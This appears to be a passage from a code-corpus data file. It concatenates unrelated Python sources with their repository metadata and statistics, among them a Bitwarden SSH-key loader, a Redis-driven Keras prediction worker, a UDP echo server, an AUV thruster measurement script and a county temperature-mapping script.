def get_permissions(self):
# 禁用共享集群相关请求
return [AccessClusterPermission(), *super().get_permissions()]
| 38.72973 | 115 | 0.76762 | 187 | 1,433 | 5.802139 | 0.647059 | 0.0553 | 0.023963 | 0.029493 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009106 | 0.157013 | 1,433 | 36 | 116 | 39.805556 | 0.889073 | 0.534543 | 0 | 0 | 0 | 0 | 0.060372 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0.090909 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c285df3f99628a1b19eebe052fedde4a3ad13b98 | 3,012 | py | Python | landmark-recognition-2019/distribute_predict.py | StudyExchange/Kaggle | e8306cc34da6b0ec91955d8f62124459981e605e | [
"MIT"
] | 2 | 2019-04-19T12:51:31.000Z | 2019-04-19T12:51:34.000Z | landmark-recognition-2019/distribute_predict.py | StudyExchange/Kaggle | e8306cc34da6b0ec91955d8f62124459981e605e | [
"MIT"
] | null | null | null | landmark-recognition-2019/distribute_predict.py | StudyExchange/Kaggle | e8306cc34da6b0ec91955d8f62124459981e605e | [
"MIT"
] | 1 | 2018-10-05T00:35:18.000Z | 2018-10-05T00:35:18.000Z | import os
import json
import time
import redis
import platform
platform_name = platform.platform().lower()
is_win = 'windows' in platform_name
# tensorflow
import tensorflow as tf
if not is_win:
import keras.backend.tensorflow_backend as KTF
# Keras
import keras
from keras.utils import Sequence
from keras.layers import *
from keras.models import *
from keras.applications import *
from keras.optimizers import *
from keras.regularizers import *
from keras.preprocessing.image import *
from keras.applications.inception_v3 import preprocess_input
# my pkg
from config import Config
from utility import pickle_dump, pickle_load
from task import get_one_task
from feature import load_feature
from test_data import get_one_test_image_index
from predict_result import save_predict_result
from single_predict import get_single_pred
def run_task(x_test, x_train, y_train, filename_train, topn, model, redis_cli):
# 1. Fetch one image idx from redis
test_image_idx = get_one_test_image_index(
Config.REDIS_TEST_IDX_ARR_NAME, redis_cli)
if test_image_idx is None or test_image_idx >= x_test.shape[0]:
print('App sleep %ds' % Config.APP_SLEEP)
time.sleep(Config.APP_SLEEP)
return
# 2. Predict
pred_result = get_single_pred(
test_image_idx, x_test, x_train, y_train, filename_train, topn, model, Config.BATCH_SIZE)
print(type(test_image_idx), test_image_idx, pred_result['id'], pred_result['top1_pred'], len(pred_result['topn_pred_arr']), pred_result['weighted_top1_pred'], len(pred_result['weighted_topn_pred_arr']))
# 3. Save result to redis
save_predict_result(
pred_result, Config.REDIS_TEST_PREDICT_RESULT, redis_cli)
def main():
# Init redis connection
redis_cli = redis.Redis(
host=Config.HOST, port=Config.PORT, password=Config.PASSWORD)
# Fetch task params from redis
task = get_one_task(redis_cli)
if not task:
print('Do not have task, APP exit.')
print(task)
# # Init tensorflow runtime params
if not is_win:
tf_config = tf.ConfigProto()
tf_config.gpu_options.per_process_gpu_memory_fraction = task['per_process_gpu_memory_fraction']
tf_session = tf.Session(config=tf_config)
KTF.set_session(tf_session)
# Load model
model_file = os.path.join(Config.MODEL_FILE)
print(model_file)
model = load_model(model_file)
print(model.summary())
# Load feature
x_train, y_train, filename_train, _ = load_feature(
Config.FEATURE_FOLDER_PATH, 'train', Config.PRE_TRAINED_MODEL_NAME, task['model_date_str'], list(range(task['libary_batch_amount'])))
x_test, _, _, _ = load_feature(
Config.FEATURE_FOLDER_PATH, Config.TEST_DATA_NAME, Config.PRE_TRAINED_MODEL_NAME, task['model_date_str'], [1])
# Run task
while(1):
run_task(x_test, x_train, y_train, filename_train, task['topn'], model, redis_cli)
if __name__ == "__main__":
print('App start!')
main()
print('App finished!')
| 34.227273 | 206 | 0.737716 | 445 | 3,012 | 4.660674 | 0.27191 | 0.034716 | 0.043394 | 0.023144 | 0.222758 | 0.143202 | 0.098361 | 0.098361 | 0.098361 | 0.058824 | 0 | 0.003616 | 0.173639 | 3,012 | 87 | 207 | 34.62069 | 0.82965 | 0.069057 | 0 | 0.03125 | 0 | 0 | 0.082079 | 0.018996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0.015625 | 0.359375 | 0 | 0.40625 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c289563298a9d3fae2e9bd1b2b3a0cf6bcdcd9b3 | 8,614 | py | Python | bw_add_sshkeys.py | raph2i/bitwarden-ssh-agent | 505cc0cb814260aceea31bf47beee5a73bf47e94 | [
"MIT"
] | null | null | null | bw_add_sshkeys.py | raph2i/bitwarden-ssh-agent | 505cc0cb814260aceea31bf47beee5a73bf47e94 | [
"MIT"
] | 1 | 2022-03-27T02:29:32.000Z | 2022-03-27T15:51:25.000Z | bw_add_sshkeys.py | raph2i/bitwarden-ssh-agent | 505cc0cb814260aceea31bf47beee5a73bf47e94 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Extracts SSH keys from Bitwarden vault
"""
import argparse
import json
import logging
import os
import subprocess
import pexpect
import time
from pkg_resources import parse_version
def memoize(func):
"""
Decorator function to cache the results of another function call
"""
cache = dict()
def memoized_func(*args):
if args in cache:
return cache[args]
result = func(*args)
cache[args] = result
return result
return memoized_func
@memoize
def bwcli_version():
"""
Function to return the version of the Bitwarden CLI
"""
proc_version = subprocess.run(
['bw', '--version'],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return proc_version.stdout
@memoize
def cli_supports(feature):
"""
Function to return whether the current Bitwarden CLI supports a particular
feature
"""
version = parse_version(bwcli_version())
if feature == 'nointeraction' and version >= parse_version('1.9.0'):
return True
return False
def get_session():
"""
Function to return a valid Bitwarden session
"""
# Check for an existing, user-supplied Bitwarden session
session = os.environ.get('BW_SESSION')
if session is not None:
logging.debug('Existing Bitwarden session found')
return session
# Check if we're already logged in
proc_logged = subprocess.run(['bw', 'login', '--check', '--quiet'])
if proc_logged.returncode:
logging.debug('Not logged into Bitwarden')
operation = 'login'
else:
logging.debug('Bitwarden vault is locked')
operation = 'unlock'
proc_session = subprocess.run(
['bw', '--raw', operation],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return proc_session.stdout
def get_folders(session, foldername):
"""
Function to return the ID of the folder that matches the provided name
"""
logging.debug('Folder name: %s', foldername)
proc_folders = subprocess.run(
['bw', 'list', 'folders', '--search', foldername, '--session', session],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
folders = json.loads(proc_folders.stdout)
if not folders:
logging.error('"%s" folder not found', foldername)
return None
# Do we have any folders
if len(folders) != 1:
logging.error('%d folders with the name "%s" found', len(folders), foldername)
return None
return folders[0]['id']
def folder_items(session, folder_id):
"""
Function to return items from a folder
"""
logging.debug('Folder ID: %s', folder_id)
proc_items = subprocess.run(
[ 'bw', 'list', 'items', '--folderid', folder_id, '--session', session],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return json.loads(proc_items.stdout)
def add_ssh_keys(session, items, keyname):
"""
Function to attempt to get keys from a vault item
"""
for item in items:
try:
private_key_file = [k['value'] for k in item['fields']
if k['name'] == keyname and k['type'] == 0][0]
except IndexError:
logging.warning('No "%s" field found for item %s', keyname, item['name'])
continue
except KeyError as e:
logging.debug('No key "%s" found in item %s - skipping', e.args[0], item['name'])
continue
logging.debug('Private key file declared')
try:
private_key_id = [k['id'] for k in item['attachments']
if k['fileName'] == private_key_file][0]
except IndexError:
logging.warning(
'No attachment called "%s" found for item %s',
private_key_file,
item['name']
)
continue
logging.debug('Private key ID found')
try:
logging.debug('trying to add key ' + item['name'])
ssh_add(session, item['id'], private_key_id, item['name'])
except subprocess.SubprocessError:
logging.warning('Could not add key to the SSH agent')
def ssh_add(session, item_id, key_id, key_name):
"""
Function to get the key contents from the Bitwarden vault
"""
logging.debug('Item ID: %s', item_id)
logging.debug('Key ID: %s', key_id)
proc_passphrase = subprocess.run([
'bw',
'get',
'item', item_id,
'--session', session
],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
temp_passphrase = json.loads(proc_passphrase.stdout)
for field in temp_passphrase['fields']:
if field['name'] == 'passphrase':
passphrase = field['value']
proc_attachment = subprocess.run([
'bw',
'get',
'attachment', key_id,
'--itemid', item_id,
'--raw',
'--session', session
],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
ssh_key = proc_attachment.stdout
logging.debug("Running ssh-add")
cmd = ' echo "' + ssh_key + ' " | ssh-add -'
child = pexpect.spawn('sh', env=dict(os.environ, SSH_ASKPASS_REQUIRE="never"), echo=False)
child.sendline('stty -icanon')
# https://unix.stackexchange.com/questions/611355/does-zsh-use-canonical-mode-for-the-terminal
# https://github.com/pexpect/pexpect/issues/55
# https://pexpect.readthedocs.io/en/stable/api/pexpect.html (send, PC_MAX_CANON)
# i'm using macOS with zsh as my loginshell, just works
time.sleep(0.2)
cmdlines = cmd.splitlines()
for item in cmdlines:
child.sendline(item)
time.sleep(0.2)
index = child.expect(['Enter passphrase for.*', '.*dentity added:.*', pexpect.TIMEOUT, pexpect.EOF], timeout=2)
if index == 0:
logging.debug('Entering passphrase...')
child.waitnoecho()
child.sendline(passphrase)
child.waitnoecho()
passphraseindex = child.expect([pexpect.TIMEOUT, pexpect.EOF, '.*dentity added:.*', '.*ad passphrase, try again for.*'], timeout=2)
if passphraseindex == 0:
logging.debug('Passphrase timeout')
if passphraseindex == 1:
logging.debug('EOF?')
if passphraseindex == 2:
logging.info('Identity ' + key_name + ' added')
if passphraseindex == 3:
logging.error('Wrong passphrase, skipping...')
if index == 1:
logging.info('Identity ' + key_name + ' added, no passphrase needed')
if index == 2:
logging.error('Timeout')
if index == 3:
logging.debug('EOF?')
child.close()
cmd = None
passphrase = None
if __name__ == '__main__':
def parse_args():
"""
Function to parse command line arguments
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'-d', '--debug',
action='store_true',
help='show debug output',
)
parser.add_argument(
'-f', '--foldername',
default='ssh-agent',
help='folder name to use to search for SSH keys',
)
parser.add_argument(
'-c', '--customfield',
default='private',
help='custom field name where private key filename is stored',
)
return parser.parse_args()
def main():
"""
Main program logic
"""
args = parse_args()
if args.debug:
loglevel = logging.DEBUG
else:
loglevel = logging.INFO
logging.basicConfig(level=loglevel)
try:
logging.info('Getting Bitwarden session')
session = get_session()
logging.debug('Session = %s', session)
logging.info('Getting folder list')
folder_id = get_folders(session, args.foldername)
logging.info('Getting folder items')
items = folder_items(session, folder_id)
logging.info('Attempting to add keys to ssh-agent')
add_ssh_keys(session, items, args.customfield)
except subprocess.CalledProcessError as e:
if e.stderr:
logging.error('`%s` error: %s', e.cmd[0], e.stderr)
logging.debug('Error running %s', e.cmd)
main()
| 27.608974 | 139 | 0.582076 | 980 | 8,614 | 5.02449 | 0.246939 | 0.046304 | 0.021324 | 0.035337 | 0.147035 | 0.119821 | 0.093826 | 0.078392 | 0.078392 | 0.077173 | 0 | 0.005454 | 0.297539 | 8,614 | 311 | 140 | 27.697749 | 0.808296 | 0.112143 | 0 | 0.240385 | 0 | 0 | 0.172206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052885 | false | 0.086538 | 0.038462 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c28ec108318e201e5db04dd093d9facb3dd88500 | 459 | py | Python | setup.py | tbrekalo/mini | dc934e6f2bec3efa6053146413db0c3561fcd39e | [
"MIT"
] | 3 | 2022-03-13T14:10:41.000Z | 2022-03-14T11:58:14.000Z | setup.py | tbrekalo/mini | dc934e6f2bec3efa6053146413db0c3561fcd39e | [
"MIT"
] | null | null | null | setup.py | tbrekalo/mini | dc934e6f2bec3efa6053146413db0c3561fcd39e | [
"MIT"
] | null | null | null | import sys
from skbuild import setup
setup(
name="minipy",
version="1.3.0",
author="Tvrtko Brekalo",
author_email="brekalo.tvrtko@gmail.com",
description="Minimizer extraction utility library as described in minimap paper",
url="https://github.com/tbrekalo/mini",
license="BSD",
packages=['minipy'],
package_dir={'': 'src'},
cmake_install_dir="src/minipy",
include_package_data=True,
python_requires=">=3.8"
)
| 25.5 | 85 | 0.67756 | 58 | 459 | 5.241379 | 0.793103 | 0.039474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013158 | 0.172113 | 459 | 17 | 86 | 27 | 0.786842 | 0 | 0 | 0 | 0 | 0 | 0.379085 | 0.052288 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c28f559d3b7bcf1124708b2db4c08bfa39e48118 | 903 | py | Python | cotidia/blog/migrations/0009_auto_20190602_1908.py | guillaumepiot/cotidia-blog | 80b5e8d891ca02533bfce804a2c75188501c5273 | [
"BSD-3-Clause"
] | null | null | null | cotidia/blog/migrations/0009_auto_20190602_1908.py | guillaumepiot/cotidia-blog | 80b5e8d891ca02533bfce804a2c75188501c5273 | [
"BSD-3-Clause"
] | null | null | null | cotidia/blog/migrations/0009_auto_20190602_1908.py | guillaumepiot/cotidia-blog | 80b5e8d891ca02533bfce804a2c75188501c5273 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.0.1 on 2019-06-02 19:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0008_unique_uuid'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'ordering': ['-publish_date'], 'permissions': (('publish_article', 'Can publish article'),), 'verbose_name': 'Article', 'verbose_name_plural': 'Articles'},
),
migrations.RenameField(
model_name='articletranslation',
old_name='created_at',
new_name='date_created',
),
migrations.RenameField(
model_name='articletranslation',
old_name='modified_at',
new_name='date_updated',
),
migrations.RemoveField(
model_name='articletranslation',
name='uuid',
),
]
| 28.21875 | 176 | 0.579181 | 81 | 903 | 6.234568 | 0.567901 | 0.053465 | 0.160396 | 0.118812 | 0.217822 | 0.217822 | 0.217822 | 0 | 0 | 0 | 0 | 0.029781 | 0.293466 | 903 | 31 | 177 | 29.129032 | 0.761755 | 0.049834 | 0 | 0.36 | 1 | 0 | 0.28271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.16 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c292a5653546feabbd51f70e26a6b78a4de5afab | 956 | py | Python | example_echo_server.py | lxndrdagreat/udp-socket-server | 8ffc99286bc7eeccb8e7c0f767d643ae10b0b872 | [
"MIT"
] | 3 | 2017-07-10T13:48:27.000Z | 2019-08-04T14:26:03.000Z | example_echo_server.py | lxndrdagreat/udp-socket-server | 8ffc99286bc7eeccb8e7c0f767d643ae10b0b872 | [
"MIT"
] | null | null | null | example_echo_server.py | lxndrdagreat/udp-socket-server | 8ffc99286bc7eeccb8e7c0f767d643ae10b0b872 | [
"MIT"
] | null | null | null | from server import ThreadedUDPServer
import threading
# Create the server instance and assign the binding address for it
server = ThreadedUDPServer(('localhost', 9999))
# Set up a few example event handlers
@server.on('connected')
def connected(msg, socket):
""" Both 'connected' and 'disconnected' are events
reserved by the server. It will call them automatically.
"""
print("New client: {}".format(socket))
@server.on('message')
def got_message(msg, socket):
""" This is a custom event called "message".
When a client sends a message event, this handler
will repeat that message back to all connected clients.
"""
print("[{}]: {}".format(socket, msg))
server.send_all('message', msg)
if __name__ == "__main__":
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
while True:
pass
server.shutdown()
| 25.157895 | 66 | 0.682008 | 120 | 956 | 5.316667 | 0.591667 | 0.056426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005291 | 0.209205 | 956 | 37 | 67 | 25.837838 | 0.838624 | 0.368201 | 0 | 0 | 0 | 0 | 0.111511 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.058824 | 0.117647 | 0 | 0.235294 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c2978c8505a4cda21678e127b5aaef6476a68d9e | 375 | py | Python | app/__init__.py | synqs/ArduinoMagnetometerLogger | 8405dd5ad17d58562b9c78743525222d84bf3c7e | [
"MIT"
] | null | null | null | app/__init__.py | synqs/ArduinoMagnetometerLogger | 8405dd5ad17d58562b9c78743525222d84bf3c7e | [
"MIT"
] | null | null | null | app/__init__.py | synqs/ArduinoMagnetometerLogger | 8405dd5ad17d58562b9c78743525222d84bf3c7e | [
"MIT"
] | null | null | null | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_socketio import SocketIO
from config import Config
import eventlet
eventlet.monkey_patch()
# where should I move this normally ?
async_mode = None
app = Flask(__name__)
bootstrap = Bootstrap(app)
socketio = SocketIO(app, async_mode='eventlet')
app.config.from_object(Config)
from app import routes
| 20.833333 | 47 | 0.808 | 53 | 375 | 5.528302 | 0.415094 | 0.09215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130667 | 375 | 17 | 48 | 22.058824 | 0.898773 | 0.093333 | 0 | 0 | 0 | 0 | 0.023669 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c29b209f7f37fc6ee82893da244c3a874a0f0905 | 4,736 | py | Python | sensors/kalman/util/measure_thrusters.py | cuauv/software | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | [
"BSD-3-Clause"
] | 70 | 2015-11-16T18:04:01.000Z | 2022-03-05T09:04:02.000Z | sensors/kalman/util/measure_thrusters.py | cuauv/software | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | [
"BSD-3-Clause"
] | 1 | 2016-08-03T05:13:19.000Z | 2016-08-03T06:19:39.000Z | sensors/kalman/util/measure_thrusters.py | cuauv/software | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | [
"BSD-3-Clause"
] | 34 | 2015-12-15T17:29:23.000Z | 2021-11-18T14:15:12.000Z | #!/usr/bin/env python2
'''
measure_thrusters.py attempts to determine the impulse response
of each thruster for system identification.
That is, suppose:
T(t) = thrust value at time t
R(t) = angular rate at time t
R(t) depends upon T(tao) for tao < t
If we assume that R is linear in T and time-invariant then
R(t) = \int_0^\infty g(k) T(t-k) dk for some function g(k), k > 0
or, discretized,
R(t) = \sum_{k=0}^\infty g(k) T(t-k)
We want to determine g(k) so that we predict R given past T values
To do this we measure R for fixed, simple inputs of T
In particular, we use a step function T=0 before t=0
and T=constant afterwards
(We stop running the thruster at some point, but this should be
long enough later that the vehicle has 'forgotten' about the
initial T=0 state.)
In this simple case then R(t) = \sum_{k=0}^t g(k) T
where T is the constant value of T(t>0)
which then gives that: g(t) = R'(t)/T which is easy to determine!
'''
from time import sleep, time
from numpy import array
import shm
# Which axis/variable we are trying to measure with
measured_vars = ['shm.imu.yaw_vel',
'shm.kalman.heading_rate',
'shm.kalman.heading',
'shm.dvl.velocity_x',
'shm.dvl.velocity_y',
#'shm.kalman.vely',
#'shm.kalman.velx',
'shm.kalman.depth',
'shm.kalman.roll',
'shm.kalman.pitch',
'shm.kalman.accelx',
'shm.kalman.accely',
]
thrusters = ['port', 'starboard', 'sway_aft', 'sway_fore', 'aft', 'fore']
pwm_values = [50,75,100,125,150,175,200,225,255,
-50,-75,-100,-125,-150,-175,-200,-225,-255]
TRIAL_LENGTH = 6.0 #Seconds
RESET_TIME = 4.0
CALM_TIME = 4.0
MEASUREMENT_PERIOD = 0.02
data = dict( (mv,dict( (t,dict((v,[]) for v in pwm_values)) for t in thrusters )) for mv in measured_vars)
if __name__ == '__main__':
start = time()
runs = []
for t in thrusters:
for v in pwm_values:
done = False
while not done:
try:
shm.motor_desires.__getattribute__(t).set(0)
# Set desired heading to current so we don't flip out
shm.navigation_desires.heading.set(shm.kalman.heading.get())
# Enable controller so that we don't go floating off
print "%0.2f: Resetting..." % (time()-start)
shm.settings_control.enabled.set(1)
sleep(RESET_TIME)
# Let sub drift with no input
shm.settings_control.enabled.set(0)
sleep(CALM_TIME)
# Hold motor value constant for a while
print "%0.2f: Trying %s at %s..." % (time()-start,t,v)
shm.motor_desires.__getattribute__(t).set(v)
# Measure data
begin = time()
count = 0
while time() < begin+TRIAL_LENGTH:
while time()-begin > count*MEASUREMENT_PERIOD:
for mv in measured_vars:
data[mv][t][v].append(eval(mv).get())
count += 1
sleep(0)
shm.motor_desires.__getattribute__(t).set(0)
# Set desired heading to current so we don't flip out
shm.navigation_desires.heading.set(shm.kalman.heading.get())
# Enable controller so that we don't go floating off
print "%0.2f: Resetting..." % (time()-start)
shm.settings_control.enabled.set(1)
sleep(RESET_TIME)
done = True
except KeyboardInterrupt:
# Clear log
data[t][v] = []
# Set desired heading to current so we don't flip out
shm.navigation_desires.heading.set(shm.kalman.heading.get())
# Enable controller so that we don't go floating off
shm.settings_control.enabled.set(1)
print "Interrupted!"
print "Stopping measurements so that the sub may be driven"
raw_input("[ENTER] when done (or CTRL-C again to kill)")
shm.settings_control.enabled.set(1)
print "Done recording!"
print "Writing output to 'thrusts.pickle'"
# Convert recorded data to arrays
data = dict( (t,dict( (v,array(x)) for v,x in d.items())) for t,d in data.items() )
# Write output:
import pickle
pickle.dump(data, open("thrusts.pickle","w"))
| 36.430769 | 106 | 0.548353 | 642 | 4,736 | 3.956386 | 0.345794 | 0.04252 | 0.014173 | 0.049213 | 0.363386 | 0.301575 | 0.28937 | 0.253937 | 0.253937 | 0.234252 | 0 | 0.027132 | 0.346284 | 4,736 | 129 | 107 | 36.713178 | 0.793282 | 0.117821 | 0 | 0.19697 | 0 | 0 | 0.138855 | 0.007081 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.060606 | null | null | 0.106061 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c29c29afa60455a7d0588c62b67fc8f7b0322e34 | 7,491 | py | Python | temps2.py | reasner/temps | 3221524187d12cf5099546b5fb3e9f0bf45a479b | [
"MIT"
] | null | null | null | temps2.py | reasner/temps | 3221524187d12cf5099546b5fb3e9f0bf45a479b | [
"MIT"
] | null | null | null | temps2.py | reasner/temps | 3221524187d12cf5099546b5fb3e9f0bf45a479b | [
"MIT"
] | null | null | null | import os
import pandas as pd
import geopandas as gpd
import matplotlib.pyplot as plt
#SETUP
cd = os.path.join(os.path.expanduser("~"),r'Documents',r'projects',r'temps')
cd_dotdot = os.path.join(os.path.expanduser("~"),r'Documents',r'projects')
if not os.path.exists(os.path.join(cd,r'simple_maps')):
os.makedirs(os.path.join(cd,r'simple_maps'))
#LOAD WEATHER
extreme_df_path = os.path.join(cd,'extremes.csv')
extremes = pd.read_csv(extreme_df_path)
precip_path = os.path.join(cd,'precip.csv')
precip = pd.read_csv(precip_path)
tmax_path = os.path.join(cd,'tmax.csv')
tmax = pd.read_csv(tmax_path)
tmin_path = os.path.join(cd,'tmin.csv')
tmin = pd.read_csv(tmin_path)
tavg_path = os.path.join(cd,'tavg.csv')
tavg = pd.read_csv(tavg_path)
#LOAD MAPS
county_shapefile_path = os.path.join(cd_dotdot,r'cfs_cz_shapefile_and_distances',r'fips',r'fips.shp')
county_map = gpd.read_file(county_shapefile_path)
#SIMPLE MAPS
#January Average
jan_avg_data = tavg[['fips','jan']].copy()
jan_avg_data['fips'] = jan_avg_data['fips'].astype(str)
jan_avg_data['fips'] = jan_avg_data['fips'].str.zfill(5)
jan_avg_df = pd.merge(county_map,jan_avg_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
jan_avg_df.plot(ax=ax, column='jan',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average January Temperature (1970-2000)')
jan_avg_path = os.path.join(cd,r'simple_maps','jan_avg.png')
plt.savefig(jan_avg_path,bbox_inches='tight',dpi=300)
plt.clf()
#July Average
jul_avg_data = tavg[['fips','jul']].copy()
jul_avg_data['fips'] = jul_avg_data['fips'].astype(str)
jul_avg_data['fips'] = jul_avg_data['fips'].str.zfill(5)
jul_avg_df = pd.merge(county_map,jul_avg_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
jul_avg_df.plot(ax=ax,column='jul',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average July Temperature (1970-2000)')
jul_avg_path = os.path.join(cd,r'simple_maps','jul_avg.png')
plt.savefig(jul_avg_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days above 25
above_25_data = extremes[['fips','avg_daily_max_air_temp_25']].copy()
above_25_data['fips'] = above_25_data['fips'].astype(str)
above_25_data['fips'] = above_25_data['fips'].str.zfill(5)
above_25_df = pd.merge(county_map,above_25_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_25_df.plot(ax=ax,column='avg_daily_max_air_temp_25',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 25 (1979-2011)')
above_25_path = os.path.join(cd,r'simple_maps','above_25.png')
plt.savefig(above_25_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days above 30
above_30_data = extremes[['fips','avg_daily_max_air_temp_30']].copy()
above_30_data['fips'] = above_30_data['fips'].astype(str)
above_30_data['fips'] = above_30_data['fips'].str.zfill(5)
above_30_df = pd.merge(county_map,above_30_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_30_df.plot(ax=ax,column='avg_daily_max_air_temp_30',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 30 (1979-2011)')
above_30_path = os.path.join(cd,r'simple_maps','above_30.png')
plt.savefig(above_30_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days below 35
above_35_data = extremes[['fips','avg_daily_max_air_temp_35']].copy()
above_35_data['fips'] = above_35_data['fips'].astype(str)
above_35_data['fips'] = above_35_data['fips'].str.zfill(5)
above_35_df = pd.merge(county_map,above_35_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_35_df.plot(ax=ax,column='avg_daily_max_air_temp_35',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 35 (1979-2011)')
above_35_path = os.path.join(cd,r'simple_maps','above_35.png')
plt.savefig(above_35_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days below 45
above_45_data = extremes[['fips','avg_daily_max_air_temp_45']].copy()
above_45_data['fips'] = above_45_data['fips'].astype(str)
above_45_data['fips'] = above_45_data['fips'].str.zfill(5)
above_45_df = pd.merge(county_map,above_45_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_45_df.plot(ax=ax,column='avg_daily_max_air_temp_45',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 45 (1979-2011)')
above_45_path = os.path.join(cd,r'simple_maps','above_45.png')
plt.savefig(above_45_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days over 80
above_80_data = extremes[['fips','avg_daily_max_air_temp_80']].copy()
above_80_data['fips'] = above_80_data['fips'].astype(str)
above_80_data['fips'] = above_80_data['fips'].str.zfill(5)
above_80_df = pd.merge(county_map,above_80_data,on='fips',how='inner')
